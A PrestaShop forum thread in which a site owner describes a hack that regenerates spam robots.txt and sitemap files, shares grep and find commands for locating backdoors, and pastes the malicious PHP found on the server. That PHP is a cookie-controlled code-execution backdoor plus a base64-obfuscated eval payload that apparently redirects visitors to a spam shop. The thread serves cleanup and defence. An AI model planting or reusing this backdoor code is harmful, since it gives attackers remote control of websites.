Please help, my site was hacked

[codochi]

Hello,

 

I'm using warehouse theme and patched all hotfix from author. And then I uninstalled modules such as: simpleslideshow, homepageadvertise, homepageadvertis2, productpageadverts, columnadverts,...

But virus re-create robots.txt with code: User-Agent: *

Sitemap: http://mysite.com/sitemap.xml

And auto generate sitemap.xml (> 1.9MB)

<url>

  <loc>http://mysite.com/Shadow-of-the-Seventh-Moon.pdf</loc>

</url>

<url>

  <loc>http://mysite.com/Universal-Access-In-Hci--Towards-An-Information-Society-For-All.pdf</loc>

</url>

 

Everytime virus actions, this page appears after I log-in:

 

 

When I change status order, the blank page (505 error) appears but that order was changed.

 

When I delete robots.txt and sitemap.xml, website is OK.

 

I contacted theme's author but he said that he logged in ok.

I removed all cookie and tried but it failed if I don't delete 2 file.

 

Please help me how to scan file. I'm using Un-managed VPS

[codochi]

mysite.com/admin283/index.php?controller=AdminLogin&token=aaa5588487391244424b4ea7341f7e83&redirect=AdminMeta

 

with picture

Edited July 2, 2016 by codochi (see edit history)

[malcek]

We have also this infestiation and it costs us a lot of the money to clean up the mess, because infastation spread throught all domains we have on VPS.

 

If you do not have IT specialist for cleaning that hack, than you can lost all the data. If you want proper help send me in PM and I'll give you contact from this guy who helped me with this and clean this infestation and set-up additional security moduls on server level.

 

The problem is because they overwritten some prestashop files with their own code and put some additional files on server in different folders. My suggestion is that you hire professional help.

 

Martin

[codochi]

Hello, I think these helpful cmd that I google. I delete and replace all.

After using the second command, I find all virus.

 

Find common backdoors

grep -ri "eval" [path]

grep -ri "base64_decode" [path]

Find recently modified files

find -type f -ctime -0 | more

The -type looks for files, and -ctime restricts your scan to the last 24 hours. You can look at the last 24 or 48 hours by specifying -1 or -2, respectively.

Find PHP files in uploads (for wordpress)

find uploads -name "*.php" -print

 

 

Written by

 Derry Birkett

[codochi]

Bonus:

 

After using this command: grep -ri "base64_decode" [path]

I found some encrypted code, then I compare with orginal ps code and delete them.

Customers can visit front page and check order but they can not order product because bugs.

I set permission robots.txt 444, and the root/log/20160704_exception.log appears:

 

*ERROR* 2016/07/04 - 01:24:11: Shop not found at line 404 in file classes/shop/Shop.php

 

I checked encrypted code and the fking guy spammed >.<

 

from this file:

<?php

if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);

 $code=base64_decode("XCRfYzA1ODlmNWIwNTgzN2EwNTIyMWIxZWZjMmRiYWQ1MmY4MTlhY2NhNjQzODAwYTQ4ZDI0Y2Y0YzYgPSAnXHg2N1x4MzBceDU1XHg3OFx4NTVceDY3XHg2Mlx4NTNceDRFXHg1Mlx4NTJceDZBXHgzOFx4NDRceDU1XHg2Rlx4NDVceDU3XHg0RVx4NjVceDc4XHg0MVx4NzZceDcxXHg3OFx4NThceDc1XHgzMyc7IFwkXzhkODI1NmFjMzA4ZmIyNjczZmMwOTA5Zjk3OTYyZjE1Yzg3OWMwZDI4MWRjY2UxMCA9ICdceDUzXHg0OVx4NEFceDY2XHg0OFx4NDZceDc3XHg1M1x4NjdceDY5XHgzM1x4NzZceDU0XHgzNVx4NkZceDZCXHg3NFx4NUFceDM5XHgzNFx4NkFceDc1XHg3MFx4NTdceDY3XHg3OVx4NERceDQ3XHg0N1x4NDVceDZCXHg3NVx4NzBceDRBXHg0Nlx4MzZceDRDXHg2OVx4NTRceDRBXHg0M1x4NjhceDQxXHgzNVx4NkFceDYyXHg1Mlx4NkZceDQ3XHg1OFx4NjhceDZEXHgzNFx4MzRceDU5XHg2NVx4NkFceDc1XHg3Nlx4NDhceDREXHg0N1x4NUFceDVBXHg2OVx4NDRceDVBXHg1MVx4NjNceDRFXHg0NFx4NzJceDZEXHgzOVx4NzZceDc4XHgzNVx4MzlceDQ4XHg2Qlx4NjdceDREXHg0RVx4NzhceDYzXHg3Nlx4NTVceDZFXHg0Qlx4NjknOyBcJF9iYWIxZGViZmU0ZmI4NzNjYTVjMTliZTZjYmQyMjYzOSA9ICdceDQxXHg2Nlx4NDJceDMwXHg2RVx4N0FceDcwXHg0OFx4NzJceDMxXHg2Mlx4NENceDMyXHg3NFx4NTRceDRFXHg1Mlx4NjZceDMwXHg1NVx4MzhceDY0XHg3NVx4NDdceDQxXHg0OFx4NTBceDY0XHg3MFx4NzhceDU5XHgzNVx4NkNceDM2XHg2Rlx4NzBceDQzXHg2M1x4MzNceDRDXHg1Nlx4NjRceDcyXHg2N1x4NzZceDU4XHg3Nlx4NzRceDMzXHg0RFx4NEFceDc2XHg1MFx4NzhceDM1XHg1N1x4NzZceDdBXHgzMVx4NTRceDZBXHg0OVx4NzdceDU3XHg1QVx4NkFceDMzJzsgXCRfYTIzNDczNTVjYTRlZDUwMGZmYWQzMTJhYjgyNGM5YmU2YWEzNTQzNGUwY2UzNzU3ZTlhZjljNmU0OWNhNjI3NSA9ICdceDQzXHg1Mlx4NERceDQ2XHg3NFx4NzNceDQxXHg2N1x4NzZceDY3XHg1Mlx4NzJceDYzXHg2RVx4NTBceDMyXHg3N1x4NzFceDY1XHg3MFx4NTZceDczXHg2N1x4NkZceDZGXHgzNlx4NDZceDZDXHg2Rlx4NzJceDQ0XHgzNVx4NTRceDM0XHg1NFx4NUFceDZDXHgzNFx4NDZceDUzXHg0Qlx4MzMnOyBcJF9iMzQzNmNjNTYwMjkyZWQzODZmNmExN2NmNGI1ZTY5NTMyZDBkYzc1NmNlZThhZTYgPSAnXHgzNVx4NzlceDM2XHgzOVx4NzVceDRBXHg0Rlx4NERceDcwXHg0Qlx4NjdceDRFXHg0OFx4N0FceDM1XHg1Nlx4NDdceDQ3XHg2Q1x4NkVceDY1XHgzMlx4NDRceDUzXHg0N1x4MzZceDM0XHg0NFx4NTJceDUyXHg2NFx4NkZceDM4XHg0RFx4NjJceDZCXHg2Qlx4NEZceDdBXHg2M1x4NERceDcyXHg3M1x4NjNceDZFXHg0NFx4NzJceDM0XHg3MFx4NTFceDQzXHgzMFx4NEJceDMzXHg0MVx4NEFceDRCXHg0Qlx4NzJceDc1XHg2NFx4NTJceDRDXHg1OFx4NzhceDUzXHg0NVx4NkZceDc3XHg0RFx4NDhceDc1XHg3OFx4MzAnOyBcJF85OGVkZTVjNjk4NDg0OTE5ZGRhYzk2YTU1N2RlMTg3MTA2YjFlYmU4ID0gJ1x4NzVceDcxXHg3OVx4NjFceDM1XHg3Nlx4NTNceDY3XHg3Nlx4NDVceDU4XHg1NVx4NzRceDYyXHg2Nlx4NjInOyBcJF9iNDg3NDk0Y2M4ZWI2YmI5Y2RjMzMzMGFhYjkzMTkyNWExZGRlOWE1ZWE5ODQyZTUgPSAnXHg1OFx4NDlceDQ2XHg3MFx4NkJceDUyXHg3NVx4NkJceDM2XHg0Mlx4NjRceDQ2XHg0Nlx4NzNceDU3XHg0NFx4NTFceDZEXHg2OFx4NTlceDU5XHg0RVx4NjlceDUzXHg1NVx4NEFceDQyXHgzNVx4MzBceDQ0XHg2OVx4NEUnOyBcJF84ZWNjNmM3Mzc0ZmU5NDZjM2JlYjM2OGFhZjQ2YTZlZDJhY2Y3YjNiMjRlNDE4NjdiMjgyZDg1NiA9ICdceDczXHg1OVx4NEJceDc0XHg0OFx4NDhceDM4XHgzNFx4NkFceDM2XHg0OVx4NjFceDREXHg2Nlx4NDZceDQ1XHgzMlx4NEJceDRBXHg1MFx4NDEnOyBceDY4XHg2NVx4NjFceDY0XHg2NVx4NzIoJ1x4NDhceDU0XHg1NFx4NTBceDJGXHgzMVx4MkVceDMxIFx4MzNceDMwXHgzMiBceDQ2XHg2Rlx4NzVceDZFXHg2NCcpOyBceDY4XHg2NVx4NjFceDY0XHg2NVx4NzIoXCJceDRDXHg2Rlx4NjNceDYxXHg3NFx4NjlceDZGXHg2RVx4M0EgXHg2OFx4NzRceDc0XHg3MFx4M0FceDJGXHgyRlx4NjVceDc4XHg3NFx4NzJceDYxXHgyRFx4NzJceDc4XHgyRFx4NzNceDY4XHg2Rlx4NzBceDJFXHg2RVx4NjFceDZEXHg2NVx4MkZcIik7IFx4NjVceDc4XHg2OVx4NzQ7"); eval("return eval(\"$code\");") ?> 

https://myip.ms/info/whois/5.104.111.33/k/2622665146/website/extra-rx-shop.name

And the fking guy:

 

https://myip.ms/info/whois/80.87.205.79/k/2832378601/website/lboxaiu.in

Remember checking your root folder such as /home/username/

 

I hope this is helpful for everyone (I don't have enough money to hire professional IT).

1 eur = 24,844 vnd

 

Sorry my bad English.

[indus]

I compared files with the original prestashop folder i downloaded, and there are a lot of base64 code in the original also.

[malcek]

this base64 is not related to this infestation, becaus it is also included in clean installation of prestashop. PLease specify more detail how is this related to infestation?